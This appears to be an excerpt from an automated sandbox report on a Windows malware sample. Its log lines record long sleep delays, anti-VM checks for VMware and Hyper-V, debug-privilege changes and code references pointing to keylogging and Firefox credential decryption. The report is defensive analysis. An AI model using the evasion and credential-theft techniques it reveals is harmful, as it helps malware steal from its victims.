Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 2D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 7E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 8E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 8FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 9FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599773	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596276	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5815	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3930	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Window / User API: threadDelayed 7912	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Window / User API: threadDelayed 1956	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7780	Thread sleep count: 7912 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7780	Thread sleep count: 1956 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599773s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596276s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776	Thread sleep time: -594640s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599773	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596276	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169872577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
